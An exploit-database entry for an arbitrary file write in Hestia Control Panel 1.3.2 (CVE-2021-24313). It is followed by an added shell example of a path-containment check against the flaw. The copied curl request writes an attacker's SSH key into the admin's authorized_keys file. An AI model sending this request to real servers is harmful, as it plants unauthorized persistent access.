Hestia Control Panel 1.3.2 Arbitrary File Write

CVE: CVE-2021-24313
Category: CWE-22
Price: $500
Severity: Critical
Author: Unnamed
Risk: Critical
Exploitation Type: Remote
Date: 2021-03-18
Our sensors found this exploit at: https://cxsecurity.com/ascii/WLB-2021030113

Below is a copy:

# Title: Hestia Control Panel 1.3.2 - Arbitrary File Write
# Date: 07.03.2021
# Author: Numan Türle
# Vendor Homepage: https://hestiacp.com/
# Software Link: https://github.com/hestiacp/hestiacp
# Version: < 1.3.3
# Tested on: HestiaCP Version 1.3.2

curl --location --request POST 'https://TARGET:8083/api/index.php' \
--form 'hash="HERE_API_KEY"' \
--form 'returncode="yes"' \
--form 'cmd="v-make-tmp-file"' \
--form 'arg1="ssh-rsa HERE_KEY"' \
--form 'arg2="/home/admin/.ssh/authorized_keys"' \
--form 'arg3=""' \
--form 'arg4=""' \
--form 'arg5=""'
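
The request above passes file content in arg1 and a caller-chosen destination path in arg2. The following is an added example, not HestiaCP's code or its actual fix, of the containment check that blocks this class of write (CWE-22); ALLOWED_BASE and all function names are hypothetical.

```shell
#!/bin/sh
# Added example: confine a "write temp file" helper to one directory (CWE-22).
# ALLOWED_BASE and all function names are hypothetical, not HestiaCP code.
ALLOWED_BASE=${ALLOWED_BASE:-/tmp}

# Print the physical path of $1: parent directory resolved with symlinks
# followed, file name re-appended. Fails for relative paths or a missing parent.
canonical_path() {
    local dir name
    case "$1" in /*) ;; *) return 1 ;; esac
    name=${1##*/}
    dir=${1%/*}
    case "$name" in ''|.|..) return 1 ;; esac
    dir=$(cd "${dir:-/}" 2>/dev/null && pwd -P) || return 1
    printf '%s/%s\n' "${dir%/}" "$name"
}

# Succeed only if destination $2 resolves to a location inside directory $1.
is_inside_base() {
    local base target
    base=$(cd "$1" 2>/dev/null && pwd -P) || return 1
    target=$(canonical_path "$2") || return 1
    # An existing symlink as the final component could redirect the write.
    if [ -L "$target" ]; then return 1; fi
    case "$target" in
        "$base"/*) return 0 ;;
        *)         return 1 ;;
    esac
}

# Same argument order as the request: $1 = content, $2 = destination path.
write_tmp_file() {
    if ! is_inside_base "$ALLOWED_BASE" "$2"; then
        echo "refused: $2 is outside $ALLOWED_BASE" >&2
        return 1
    fi
    printf '%s\n' "$1" > "$2"
}
```

The check and the write are separate steps, so the guarantee holds only when untrusted users cannot change directories under ALLOWED_BASE between them.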
